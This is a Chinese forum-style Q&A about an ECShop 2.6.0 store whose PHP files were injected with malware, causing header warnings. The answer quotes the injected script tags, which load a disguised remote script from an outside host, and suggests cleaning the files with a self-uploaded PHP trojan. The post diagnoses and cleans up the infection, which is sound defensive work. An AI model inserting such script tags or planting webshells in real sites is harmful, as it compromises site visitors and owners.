紧急!!!网店被封马,后台进不去。查不清原因。

2016-07-07 15:45 来源:www.chinab4c.com 作者:ecshop专家

能帮帮我吗?
被人挂马了。我用的是2。6。0的版本

进后台提示:

Warning: Cannot modify header information - headers already sent by (output started at D:\shop\includes\cls_session.php:272) in D:\shop\includes\cls_session.php on line 116

Warning: Cannot modify header information - headers already sent by (output started at D:\shop\includes\cls_session.php:272) in D:\shop\includes\cls_template.php on line 51

Warning: Cannot modify header information - headers already sent by (output started at D:\shop\includes\cls_session.php:272) in D:\shop\admin\includes\init.php on line 322

Warning: Cannot modify header information - headers already sent by (output started at D:\shop\includes\cls_session.php:272) in D:\shop\admin\includes\init.php on line 323

Warning: Cannot modify header information - headers already sent by (output started at D:\shop\includes\cls_session.php:272) in D:\shop\admin\includes\init.php on line 324

Warning: Cannot modify header information - headers already sent by (output started at D:\shop\includes\cls_session.php:272) in D:\shop\admin\includes\init.php on line 325

Warning: Cannot modify header information - headers already sent by (output started at D:\shop\includes\cls_session.php:272) in D:\shop\admin\includes\init.php on line 326


进入网站是提示被挂马,而且顶部还有


Warning: Cannot modify header information - headers already sent by (output started at D:\shop\includes\lib_article.php:87) in D:\shop\includes\init.php on line 149

Warning: Cannot modify header information - headers already sent by (output started at D:\shop\includes\lib_article.php:87) in D:\shop\includes\init.php on line 150

Warning: Cannot modify header information - headers already sent by (output started at D:\shop\includes\lib_article.php:87) in D:\shop\includes\cls_template.php on line 51


怎么办啊??急。。

回答:
源代码中出现:

<script src=http://cn.com.fengyunfz.com.cn/count/js/gif.gif></script>
<script src=http://cn.com.fengyunfz.com.cn/count/js/gif.gif></script>
<script src=http://cn.com.fengyunfz.com.cn/count/js/gif.gif></script>
<script src=http://cn.com.fengyunfz.com.cn/count/js/gif.gif></script>
<script src=http://cn.com.fengyunfz.com.cn/count/js/gif.gif></script>
<script src=http://cn.com.fengyunfz.com.cn/count/js/gif.gif></script>

是全部的源文件的最后都有上面的挂马代码。

自己上传一个PHP木马,整站保存备份,清除每个PHP文件中的同样的语句,查毒,杀毒